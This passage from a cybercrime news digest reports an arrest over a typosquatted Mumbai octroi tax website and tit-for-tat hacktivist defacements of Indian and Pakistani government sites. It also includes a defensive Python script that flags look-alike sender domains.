9.       Classic case of typosquatting: Mumbai cyber police arrested a school dropout and a graphic designer for creating a fake BMC octroi (local tax) collection website. The website was in operation from January till April, when the accused pulled it down on seeing an article in a local newspaper that the BMC had detected the fraud. The accused created the fake website (www.mcgmoctroi.in), differing from the genuine BMC site (www.mcgmoctroi.com) only in the top-level domain. Police are collecting information on the number of e-receipts (called PNRs) the accused issued to transport companies and the total money they managed to siphon off. The accused have been booked under several sections of the IPC and the IT Act for cheating and forgery.
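Both typosquatting cases in this digest, the transposed letters in ognc.co.in (Issue 35, item 8) and the swapped top-level domain in mcgmoctroi.in above, can be caught with the same check on inbound sender domains and links. The script below is an added example, not the police's tooling or code from the articles: the protected domain list, the fixed set of two-label public suffixes and the sample sender addresses are constructed for the demonstration.

```python
"""Flag look-alike domains that mimic a protected domain.

Added example, not code from the articles. Covers a transposition inside
the name (ongc.co.in vs ognc.co.in) and a swapped suffix (mcgmoctroi.com vs
mcgmoctroi.in). Protected list, suffix list and sample senders are constructed.
"""

PROTECTED = ["ongc.co.in", "mcgmoctroi.com"]           # constructed

# Stand-in for the Public Suffix List; assumption for the example.
TWO_LABEL_SUFFIXES = {"co.in", "co.uk", "com.au", "org.in", "net.in"}


def split_domain(domain):
    """Split 'ongc.co.in' into ('ongc', 'co.in') and 'example.org' into ('example', 'org')."""
    labels = domain.lower().strip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LABEL_SUFFIXES:
        return ".".join(labels[:-2]), ".".join(labels[-2:])
    return ".".join(labels[:-1]), labels[-1]


def damerau_distance(a, b):
    """Optimal string alignment distance: insert/delete/substitute plus adjacent transposition."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)   # transposition counts as one edit
    return d[len(a)][len(b)]


def classify(domain, protected=PROTECTED):
    """Return (verdict, matched_protected_domain):
    'genuine'   exact match
    'lookalike' same name under a different suffix, or name within one edit
    'unrelated' otherwise"""
    name, suffix = split_domain(domain)
    for good in protected:
        gname, gsuffix = split_domain(good)
        if name == gname and suffix == gsuffix:
            return "genuine", good
        if name == gname and suffix != gsuffix:
            return "lookalike", good      # suffix swap (mcgmoctroi.in)
        if damerau_distance(name, gname) == 1:
            return "lookalike", good      # transposition or typo (ognc)
    return "unrelated", None


def sender_domain(address):
    return address.rsplit("@", 1)[-1].lower()


SAMPLE_SENDERS = [                         # constructed
    "patel_dv@ongc.co.in",
    "patel_dv@ognc.co.in",
    "payments@mcgmoctroi.in",
    "noreply@example.org",
]


def run(addresses=SAMPLE_SENDERS):
    return {addr: classify(sender_domain(addr)) for addr in addresses}


if __name__ == "__main__":
    for addr, (verdict, good) in run().items():
        note = f"  (mimics {good})" if good and verdict != "genuine" else ""
        print(f"{verdict:10} {addr}{note}")
```

A distance threshold of one catches the cases on this page but will also flag legitimately similar names, so treat a hit as a reason to verify the counterparty out of band (for example by phone, before changing payment details), not as proof of fraud.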


10.   In response to the cyber-attack on the Kerala government website by Pakistan-based hackers, an anonymous Indian cyber group has retaliated by hacking into scores of official Pakistani websites. Last week - the Kerala government website was crashed by Pakistani hackers, who posted image of a burning Indian flag. The hackers had left messages such as "Pakistan Zindabad", "We are Team Pak Cyber Attacker" and "Security is just an illusion". However, hours later, the Kerala-based 'Mallu Cyber Soldiers' hacked into Pak government websites, warning the pro-Pakistan hackers to "stay away from Indian cyber space". Just like the world-famous Anonymous hacktivists, "Mallu Cyber Soldiers" is also an online gathering of security experts. These vigilantes work toward protecting Indian websites from getting hacked.